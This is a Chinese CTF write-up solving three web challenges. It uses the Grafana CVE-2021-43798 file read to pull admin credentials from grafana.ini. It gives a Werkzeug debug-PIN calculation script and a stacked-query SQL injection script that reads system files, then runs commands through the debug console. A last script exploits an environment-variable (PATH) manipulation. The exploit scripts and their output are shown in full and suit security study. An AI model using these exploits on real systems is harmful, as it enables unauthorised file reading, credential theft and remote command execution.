oh-my-grafana

在这里插入图片描述

Grafana是一款用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。
本题使用的Grafana版本为8.2.6,存在任意文件读取的漏洞(CVE-2021-43798)

由于本题需要登录,首先考虑能不能读取到grafana.ini,获取用户名和密码
在这里插入图片描述
在ini文件中搜索得到admin的用户名和密码,成功登录

1
2
3
4
5
6
7
8
9
10
11
12
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false

# default admin user, created on startup
admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = 5f989714e132c9b04d4807dafeb10ade

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

在ini文件中还可以找到使用的数据库为mysql,用户名密码都为grafana

1
2
3
4
5
6
7
# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = mysql
;host = mysql:3306
;name = grafana
;user = grafana
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password = grafana

连接mysql
在这里插入图片描述
flag就在数据库中
在这里插入图片描述

oh-my-notepro

任意用户名密码登陆后错误路径访问可以看到报错,且还是debug模式,我们可以从中获取python路径,在debug模式中使用控制台需要pin码解锁,于是可以考虑读文件来计算这台设备的pin码
在这里插入图片描述
3.8的pin码计算脚本如下,需要以下信息:

  • username,用户名,可以读取/etc/passwd得到
  • modname,默认值为flask.app
  • appname,默认值为Flask
  • moddir,flask库下app.py的绝对路径(报错得到)
  • uuidnode,当前网络的mac地址的十进制数,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算
  • machine_id,docker机器id,读取/etc/machine-id/proc/sys/kernel/random/boot_id/proc/self/cgroup,前两个任选一个与最后一个拼接
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377581187',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '653dc458-4634-42b1-9a7a-b22a082e1fce55d22089f5fa429839d25dcea4675fb930c111da3bb774a6ab7349428589aefd'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

而且可以发现在/view?note_id=xxx中存在sql注入,而且可以堆叠注入,于是考虑用load data local infile来读取本地文件的信息存储在表中,再用union select 从表中读取数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import requests

def show_tables():
    payload="0' union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema='ctf'#"
    data = {'note_id': payload}
    try:
        txt = s.get(url+'view', params=data).text
        txt = txt.split('<p style="text-align: center">')[1].split('</p>')[0].strip()
        print(txt)
    except Exception as e:
        print(e)

def load_data(filename,tablename):
    payload=f"';create table if not exists {tablename}(data text);" \
            f"load data local infile '{filename}' into table {tablename};#"
    data = {'note_id': payload}
    s.get(url + 'view', params=data)

def read_table(tablename):
    payload = f"0' union select 1,2,3,group_concat(data,'\n'),5 from {tablename}#"
    data = {'note_id': payload}
    try:
        txt = s.get(url + 'view', params=data).text
        txt = txt.split('<p style="text-align: center">')[1].split('</p>')[0].strip()
        print(txt)
    except Exception as e:
        print(e)

url = "http://192.168.1.27:5002/"
login_data = {
    'username': "mac",
    'password': "mac"
}

s=requests.session()
r = s.post(url=url+'login', data=login_data)
show_tables()
load_data('/proc/self/cgroup','a4')
read_table('a4')
show_tables()

'''
/etc/passwd

root:x:0:0:root:/root:/bin/bash
,daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
,bin:x:2:2:bin:/bin:/usr/sbin/nologin
,sys:x:3:3:sys:/dev:/usr/sbin/nologin
,sync:x:4:65534:sync:/bin:/bin/sync
,games:x:5:60:games:/usr/games:/usr/sbin/nologin
,man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
,lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
,mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
,news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
,uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
,proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
,www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
,backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
,list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
,irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
,gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
,nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
,_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
,ctf:x:1000:1000::/home/ctf:/bin/sh
,root:x:0:0:root:/root:/bin/bash
,daemon:x:1:1:d

/sys/class/net/eth0/address

02:42:ac:13:00:03

/etc/machine-id

96cec10d3d9307792745ec3b85c89620

/proc/sys/kernel/random/boot_id

b5ab2c33-deaa-45e0-b271-b3a7145f1dd3

/proc/self/cgroup

8104cff0b68712e4415efe7811acfd4fce16d2e90411d0d5e053df7a8e107a90
'''

获得了正确的PIN码后,进入控制台,用__import__("os").popen("cmd").read()执行命令,拿到flag
在这里插入图片描述

oh-my-lotto

在这里插入图片描述
首先是md5截断比较,用脚本跑出结果拿到端口号

打开附件进行源码审计

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
elif request.method == 'POST':
    flag = os.getenv('flag')
    lotto_key = request.form.get('lotto_key') or ''
    lotto_value = request.form.get('lotto_value') or ''
    try:
        lotto_key = lotto_key.upper()
        except Exception as e:
        print(e)
        message = 'Lotto Error!'
        return render_template('lotto.html', message=message)
    
    if safe_check(lotto_key):
        os.environ[lotto_key] = lotto_value
        try:
            os.system('wget --content-disposition -N lotto')
    
            if os.path.exists("/app/lotto_result.txt"):
                lotto_result = open("/app/lotto_result.txt", 'rb').read()
            else:
                lotto_result = 'result'
            if os.path.exists("/app/guess/forecast.txt"):
                forecast = open("/app/guess/forecast.txt", 'rb').read()
            else:
                forecast = 'forecast'
    
            if forecast == lotto_result:
                return flag
            else:
                message = 'Sorry forecast failed, maybe lucky next time!'
                return render_template('lotto.html', message=message)
        except Exception as e:
            message = 'Lotto Error!'
            return render_template('lotto.html', message=message)
    
    else:
        message = 'NO NO NO, JUST LOTTO!'
        return render_template('lotto.html', message=message)

源码中提供一种方式通过lotto_keylotto_value来修改环境变量的值,可以修改PATH为一个无效值,从而使wget报错,导致上一次的lotto_result不会改变,然后直接复制上一次的lotto结果传入即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
url = "http://121.36.217.177:53001/"

def lotto(key,value):
    data = {"lotto_key": key,
            "lotto_value": value}
    txt=requests.post(url + "lotto",data=data).text
    print(txt)

def getResult():
    txt=requests.get(url+"result").text
    p=txt.split("<p>")[-1].split("</p>")[0]
    return p

lotto("","")
result= {"file":getResult()}
requests.post(url + "forecast",files=result)
lotto("PATH","xxxx")
#*ctf{its_forecast_0R_GUNICORN}